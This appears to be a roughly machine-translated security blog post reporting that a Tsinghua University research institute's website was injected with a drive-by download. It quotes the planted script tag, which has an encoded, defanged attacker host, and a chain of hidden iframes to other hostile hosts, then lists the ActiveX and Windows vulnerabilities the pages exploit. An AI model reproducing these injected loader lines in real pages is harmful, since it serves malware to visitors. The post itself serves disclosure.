Tsinghua University nstitute of real estate by hackers hang horse

            Real Estate Research Institute of Tsinghua University (hxxp://s.ires.tsinghua.edu.cn/) by hackers implanted virus, if the user to access the page, the system will automatically from a malicious web site to download and run malicious programs. The infected virus user system may be remotely controlled to steal user sensitive information. Even cause crashes.

the site code:



< script language=javascript src=hxxp://%71%2E%39%34%73%61%6F%6D%6D%2E%63%6F%6D/js.js> < /script>

hxxp://q.94saomm.com/js.js framework code:



< iframe src=hxxp://tqyb.960960.net/yu/rs.htm width=100; < /iframe>

; height=0>

hxxp://tqyb.960960.net/yu/rs.htm framework code:



< iframe src=x.htm width=100; < /iframe>

; height=1>

hxxp://tqyb.960960.net/yu/x.htm framework code


was found after decryption, the malicious web pages spread through the following vulnerabilities:

RealPlayer player IERPCtl.IERPCtl.1 vulnerability

RealNetworks RealPlayer ActiveX rmoc3260.dll memory corruption vulnerability

MS06-014 vulnerability

ourgame.com GLIEDown2.dll Active controls a plurality of buffer overflow

Sina DLoader Class ActiveX control any file download vulnerability

MS08-041 vulnerability

storm video 2009 (mps.dll) ActiveX remote stack overflow >

Leave a Reply

Your email address will not be published. Required fields are marked *